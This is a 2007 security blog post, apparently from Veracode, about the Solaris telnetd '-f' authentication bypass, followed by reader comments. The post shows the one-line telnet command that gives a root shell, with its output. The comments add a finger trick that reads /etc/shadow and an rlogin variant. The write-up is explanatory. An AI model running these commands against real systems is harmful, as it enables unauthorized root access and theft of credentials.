An annoyingly stupid vulnerability in the stock Solaris 10/11 telnet daemon, courtesy of Full Disclosure (more details in this PDF, but it's NSFW): Pass "-f[user]" as the "-l" option to telnet, and presto, you bypass the entire authentication process and are logged in as the user of your choice! Works for the root user too, as long as the server is configured to allow remote root logins.

ceng@localhost [~]$ telnet a.b.c.d -l "-froot"
Trying a.b.c.d...
Connected to a.b.c.d.
Escape character is '^]'.
Last login: Thu Feb  1 02:28:29 from w.x.y.z
JESv4 Message of The Day (MOTD)

Welcome to the Sun Java Enterprise System 2005Q4!

[a.b.c.d ~]#id
uid=0(root) gid=0(root)
[a.b.c.d ~]#uname -a
SunOS a.b.c.d 5.10 Generic_118844-26 i86pc i386 i86pc

Amazing, isn't it? This works because in.telnetd exec's the Solaris login program to perform authentication. It passes the user-supplied "-l" option as a command line argument to login, which in turn supports an "-f" option that bypasses the authentication process if login was invoked by the root user. Since in.telnet.d is running as root, login inherits these privileges and happily carries out the request to bypass authentication.

This is fun to laugh at and all, but it falls into that scary category of "trivially exploitable" vulnerabilities -- those that are so easy to exploit that you don't even need special tools, not even a shell script (though the original advisory for this bug jokingly includes a script, marked "CLASSIFIED CONFIDENTIAL SOURCE MATERIAL" -- cute).

Trivially exploitable vulnerabilities have caused a lot of trouble in the past, as everyone with a shell prompt would test it out to see if it worked (admit it, you probably tried to telnet to your nearest Solaris 10 box before you read this far). Think back to the mid-90s and the infamous Ping of Death, in which an overly long ICMP payload would DoS most TCP/IP stacks, thanks to the Windows ping command permitting payload sizes longer than it should.

Ironically, Sun released an advisory just a couple weeks ago for an issue whereby a single ICMP packet causes a kernel panic and Denial of Service on a Solaris 10 box. No details on packet construction, but they do provide a stack trace which should aid in tracking down the bug, if one were so inclined.

If you really want to flip back in the history books, look up the WIZ command in sendmail, which was one of several vulnerabilities the famous Morris Worm used to propagate. Elegant attack -- just type WIZ and you'd get a shell. How far we've come in 19 years!

What's the best (read: funniest) "trivially exploitable" vulnerability that you've encountered over the years? Leave a comment.

About Chris Eng

Chris Eng, vice president of research, is responsible for integrating security expertise into Veracode’s technology. In addition to helping define and prioritize the security feature set of the Veracode service, he consults frequently with customers to discuss and advance their application security initiatives. With over 15 years of experience in application security, Chris brings a wealth of practical expertise to Veracode.

Comments (3)

reillyb | February 14, 2007 12:01 am

1) How many password-less accounts could IRIX ship with? ;)

2) ancient setuid finger bug, i.e.:

% ln -s /etc/shadow ~/.plan
% finger me

3) land vulnerability re-introduced into the XPSP2 IPv6 stack

Mike F. | February 14, 2007 1:41 pm

This smells like the old AIX rlogin bug all over again...

rlogin -l froot

Chris | February 16, 2007 2:59 pm

How about:

Removable media mounted automatically, without the nosuid option? Pop in a CD and it is off to the races.

Default /etc/hosts.equiv evilly prepopulated

A bunch of stuff in Farmer and Venema's Admin's Guide to Cracking

Please Post Your Comments & Reviews

Your email address will not be published. Required fields are marked *

Love to learn about Application Security?

Get all the latest news, tips and articles delivered right to your inbox.